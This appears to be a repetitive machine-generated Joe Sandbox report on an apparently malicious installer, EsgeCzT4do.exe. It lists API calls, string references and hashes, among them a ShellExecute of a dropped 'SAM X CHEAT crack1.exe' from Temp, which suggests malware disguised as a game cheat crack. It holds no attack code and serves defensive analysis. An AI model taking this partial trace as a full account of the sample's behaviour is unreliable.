                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00409010,?,0042B0C8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040554F
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00409010,?,0042B0C8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405555
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(0042B0C8,?,?,?,00409010,?,0042B0C8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405566
                                                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405618
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 00405629
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004054D0
                                                                                                                                                                                                                                                                                      • \*.*, xrefs: 00405528
                                                                                                                                                                                                                                                                                      • "C:\Users\user\Desktop\EsgeCzT4do.exe", xrefs: 004054C6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\EsgeCzT4do.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                                                                                                      • API String ID: 2035342205-4233441343
                                                                                                                                                                                                                                                                                      • Opcode ID: 49a23bcb4989eb2bc55f989632ffb7892a432e638327651476ee734d0b1ae01c
                                                                                                                                                                                                                                                                                      • Instruction ID: 7349ebf4964971957ddff473b41d0a41d9b63905a7032000284e6e99f459cf31
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49a23bcb4989eb2bc55f989632ffb7892a432e638327651476ee734d0b1ae01c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C51F130404A487ADB226B228C45BBF3A69DF42318F50853BF909711D1DB7D9982DE6E
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(004074B8,?,00000001,004074A8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409458,00000400,?,00000001,004074A8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 004020C1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                                                                                      • API String ID: 123533781-1943935188
                                                                                                                                                                                                                                                                                      • Opcode ID: 36078a608850ed5d6ba3cbed8c9731654616b1bc21e84282af2a803188abdfec
                                                                                                                                                                                                                                                                                      • Instruction ID: 191a2b8eefbfb1bddfad8f8f84b6cbb7561eb223b9fb57f38d09f1a7a57a31e1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36078a608850ed5d6ba3cbed8c9731654616b1bc21e84282af2a803188abdfec
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39413075A00104BFDB00EFA4CD89E9E7BBAEF49364B20426AF505EB2D1CA799D41CB54
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,0042C110,0042B4C8,004057B8,0042B4C8,0042B4C8,00000000,0042B4C8,0042B4C8,?,?,00000000,004054DA,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA7
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405EB3
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6aebaf9d7798dbd017b42e649449a55c665c1a78b7402752724ce15f47781116
                                                                                                                                                                                                                                                                                      • Instruction ID: c926c128dd9a58e72073d921ff5d887e323c8f6286bbbccf5b0fc9dd9174debe
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6aebaf9d7798dbd017b42e649449a55c665c1a78b7402752724ce15f47781116
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60D0C931A0A4205BD3011738AD0985B7A589B453713108E32F565F62E1D37899628AED
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402663
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7e137c578b74f04222f38ff18a357721fe1fd7d402001bbf8977bc4e9b84bc4f
                                                                                                                                                                                                                                                                                      • Instruction ID: 4742aed74e2d5c2fbc4c68297bab01de776a4a0a464f4ce0b78a7fb1d39a8d7e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e137c578b74f04222f38ff18a357721fe1fd7d402001bbf8977bc4e9b84bc4f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAF0A032608100ABD710E7B99989AEEB368AF11324F60467BE105F21C1DAB859459B6A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 5a819559cac325912a5da870af16f2072e900c9bb0763f72fbb9437a3d348546
                                                                                                                                                                                                                                                                                      • Instruction ID: 430467d656314c7e37725f6accf0e98df37da47b2ee055c5ee71eb9d2680c55a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a819559cac325912a5da870af16f2072e900c9bb0763f72fbb9437a3d348546
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BE18B71A00709DFDB24CF58D880BAABBF1FB45305F15852EE897A7291D738AA95CF04
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 6271c98690b1cfc42e3136c50631b776cf05fd7e3b644bcdccc108723492fea8
                                                                                                                                                                                                                                                                                      • Instruction ID: 31e596356fdf544bef750598cd2398cea7ffcaa0c07f8aabd85cf97c85a13bdb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6271c98690b1cfc42e3136c50631b776cf05fd7e3b644bcdccc108723492fea8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6C14C71A00229CBDF14CF68D4905EEB7B2FF98314F26816AD856BB384D734A952CF94
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039C6
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 004039E3
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 004039F7
                                                                                                                                                                                                                                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A13
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403A34
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A48
                                                                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403A4F
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403AFD
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403B07
                                                                                                                                                                                                                                                                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403B21
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B72
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403C18
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403C39
                                                                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00403C4B
                                                                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00403C66
                                                                                                                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C7C
                                                                                                                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403C83
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C9B
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CAE
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(0042A0C0,?,0042A0C0,0042E440), ref: 00403CD7
                                                                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,0042A0C0), ref: 00403CE6
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00403E1A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 184305955-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1e459521d90522915b7ecfcc4ffe9d1f6be81136fcbdd0795542fa10f0721686
                                                                                                                                                                                                                                                                                      • Instruction ID: 5f76212842cc3a2ea0064beba359403a4e9feef3dd5448b927816276c7a72de1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e459521d90522915b7ecfcc4ffe9d1f6be81136fcbdd0795542fa10f0721686
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BC1D431604205ABDB216F62ED85D2B3EACFB49706F40053EF541B62E1C739A942DF6E
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404030
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,000003E8), ref: 00404044
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404062
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00404073
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404082
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404091
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040409B
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040A9
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040B8
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040411B
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 0040411E
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404149
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404189
                                                                                                                                                                                                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 00404198
                                                                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004041A1
                                                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(0000070B,open,0042DBE0,00000000,00000000,00000001), ref: 004041B4
                                                                                                                                                                                                                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 004041C1
                                                                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004041C4
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041F0
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404204
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe$N$open$q?@
                                                                                                                                                                                                                                                                                      • API String ID: 3615053054-3275536505
                                                                                                                                                                                                                                                                                      • Opcode ID: 43e4b1bebc352cc37ab134c8e21d344cf3974b6da0146347b86895c6f7b453af
                                                                                                                                                                                                                                                                                      • Instruction ID: 8cc316ab489d754ba064ab1d5a66df449127ca6112c148b2bdc2fdd16cb80ba7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43e4b1bebc352cc37ab134c8e21d344cf3974b6da0146347b86895c6f7b453af
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9361DFB1A40209BFEB109F60CC45F6A3B68FB54745F10853AFB04BA2D1C7B8A951CF99
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                                                                      • DrawTextA.USER32(00000000,0042E440,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                      • Opcode ID: 9ef4e76bf49e76a01cd413a5d017736c2cab636d92d5aa9aaf47e7e990c9ee05
                                                                                                                                                                                                                                                                                      • Instruction ID: 7d427dbe4d4bacd88da03279d54ab8fa369b0c74db3328ba00a5b4b95e7f032c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ef4e76bf49e76a01cd413a5d017736c2cab636d92d5aa9aaf47e7e990c9ee05
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B41AC71804249AFCB058F95CD459BFBFB9FF44314F00802AF961AA2A0C738EA50DFA5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F2D: GetModuleHandleA.KERNEL32(?,?,00000000,00403179,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00405F3F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F2D: GetProcAddress.KERNEL32(00000000,?), ref: 00405F5A
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,00405684,?,00000000,000000F1,?), ref: 0040593C
                                                                                                                                                                                                                                                                                      • GetShortPathNameA.KERNEL32(?,0042C250,00000400), ref: 00405945
                                                                                                                                                                                                                                                                                      • GetShortPathNameA.KERNEL32(00000000,0042BCC8,00000400), ref: 00405962
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00405980
